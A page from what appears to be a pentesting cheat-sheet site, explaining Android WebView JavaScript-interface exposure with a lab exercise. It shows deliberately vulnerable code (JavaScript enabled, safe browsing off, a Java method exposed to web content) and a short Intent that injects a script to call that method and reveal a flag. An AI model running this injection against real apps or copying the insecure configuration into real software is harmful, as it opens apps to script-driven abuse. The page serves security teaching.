pwny.cc
  • Home
  • SO
    • AI
      • Evasion
        • Exercise 1
        • Exercise 2
        • Exercise 3
        • Exercise 4
    • Android
      • adb
      • apktool
      • burp suite
      • dns spoofing
      • frida
      • intent
      • jadx
      • JNI
      • objection
      • tcpdump
      • webview
    • iOS
      • objection
    • Linux
      • Internal Recon
      • Bypasses
      • Network
      • Exfiltration
      • Containers
      • Iptables
    • Windows
      • Internal Recon
      • External Recon
      • Bypasses
      • Network
      • Exfiltration
  • SHELLS
    • Misc
    • Web Shells
    • Reverse Shells
    • Obfuscated Shells
  • WEB ATTACKS
    • Misc
    • Command Injection
    • Cross-Site Scripting (XSS)
      • XSS Tips
      • WAF Bypasses
    • Insecure Direct Object Reference (IDOR)
    • Insecure File Upload
    • Local File Inclusion (LFI)
      • Bypass Techniques
      • LFI to RCE
    • OAuth
    • Open Redirect
      • Open Redirect to XSS
    • Server Side Request Forgery (SSRF)
    • Server Side Template Injection (SSTI)
    • SQL Injection (SQLi)
      • SQLMap
      • MySQL
      • MSSQL
      • Oracle
      • PostgreSQL
    • XML External Entity (XXE)
  • OTHER
    • Cracking
      • Hashcat
      • John the Ripper
    • Sandbox Escape
Powered by GitBook
On this page
  • @JavascriptInterface
  • References

Was this helpful?

  1. SO
  2. Android

webview

A View that displays web pages.

@JavascriptInterface

A Java function that contains the decorator @JavascriptInterface can be exposed into a webview. Vulnerable code:

private void configureWebView() {
        WebSettings webSettings = this.webView.getSettings();
        webSettings.setJavaScriptEnabled(true);
        webSettings.setSafeBrowsingEnabled(false);
        this.webView.setWebChromeClient(new WebChromeClient());
        this.webView.setWebViewClient(new WebViewClient());
        this.webView.addJavascriptInterface(new JavaScriptInterface(), "Android");
    }

    /* loaded from: classes3.dex */
    public class JavaScriptInterface {
        public JavaScriptInterface() {
        }

        @JavascriptInterface
        public void showToast(String message) {
            Toast.makeText(MainActivity.this, message, 0).show();
        }

        @JavascriptInterface
        public void showFlag() {
            Toast.makeText(MainActivity.this, "HXT{java-in-a-webview}", 0).show();
        }
    }

Example of exploitation:

private void sendHtmlIntent() {
        Intent intent = new Intent(Intent.ACTION_VIEW);
        intent.setComponent(new ComponentName("io.hextree.webviewdemo", "io.hextree.webviewdemo.MainActivity"));
        intent.putExtra("htmlContent", "<html><body><script>Android.showFlag();</script></body></html>");
        startActivity(intent);
    }

References

PrevioustcpdumpNextiOS

Last updated 6 months ago

Was this helpful?

WebView  |  Android DevelopersAndroid Developers
hextree.iohextree.io
Android security checklist: WebViewNews, Techniques & Guides
Logo
Logo
Logo